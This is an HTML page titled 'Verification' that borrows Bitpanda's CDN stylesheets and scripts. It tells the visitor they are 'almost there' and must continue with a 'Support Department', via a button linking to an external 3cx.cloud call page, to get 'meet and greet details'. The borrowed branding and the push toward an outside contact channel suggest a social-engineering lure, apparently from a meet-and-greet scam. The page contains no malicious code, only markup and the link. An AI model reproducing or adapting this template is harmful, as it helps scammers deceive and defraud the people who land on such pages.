

<!DOCTYPE html><html class=light lang=en><head>

<meta charset=utf-8>

<title> 
Verification 
</title>



<meta content="width=device-width, initial-scale=1.0" name=viewport>
<meta content=origin name=referrer>
<meta content="" name=description>
<link href="https://cdn.bitpanda.com/app/v2/css/all.min.css?id=622e023bba9164dff838" rel=stylesheet><script src="https://cdn.bitpanda.com/app/v2/js/head.min.js?id=e37b5634f1d9be3b8e80"></script>







<style>
.responsive-btn {
  width: 99%;
  height: 36px;
  border: 0;
  border-radius: 3px;
  background-color: #3A3B3C;
  color: #fff;
  font-size: 15px;
  font-weight: bold;
  cursor: pointer;
  transition: height 0.2s, font-size 0.2s;
}

@media (min-width: 1024px) {
  .responsive-btn {
    height: 48px;
    font-size: 24px;
  }
}
</style>

<style>
.text-107px {
  font-size: 16px;
  padding: 2px;
  color: #000000;
}

/* Increase font size for desktop screens */
@media (min-width: 1024px) {
  .text-107px {
    font-size: 23px;
  }
}
</style>


<body class="default home light" style="position: unset;"><header id=layout-header><header><div class="bp-nav js-contains-anchor"><div class=bp-nav__container><div class=util-flex-shrink-0>





<h5>

Processing . . .

  </h5>


</div></div>
</header>





 <section id=layout-content tabindex=-1><section class="default uk-padding-remove-bottom uk-section"><div class=uk-container><div class="uk-child-width-1-2@m uk-flex-middle uk-grid" uk-grid="">
<div class=default><section class="module-text uk-padding-remove-bottom uk-padding-remove-top uk-section uk-text-left uk-text-left@m">






<h5 class="text-107px">
 

Well done! You're almost there. You are required to continue your conversation with the Support Department so they can provide you with  additional meet and greet details. To proceed, simply click the "Support Department" button below.




<br>
<br>



<a href="https://1439.3cx.cloud/callus/#coach">



<button type="submit" class="responsive-btn">Support Department</button>
 
</a>


</h5>





<br><br><br><br><br>



 

</div></nav> </div> </div></div> </section> <section class=footer__navbar><div class=uk-container><div class="uk-child-width-auto@s uk-flex-between uk-flex-middle" uk-grid=""><div> </section> <section class="footer__navbar footer__navbar--sm footer__navbar__gradient"><div class=uk-container><div class=uk-flex-between uk-grid=""><div class="uk-text-center uk-text-right@m uk-width-1-1 uk-width-auto@m"></path> </symbol></svg></body></html> 
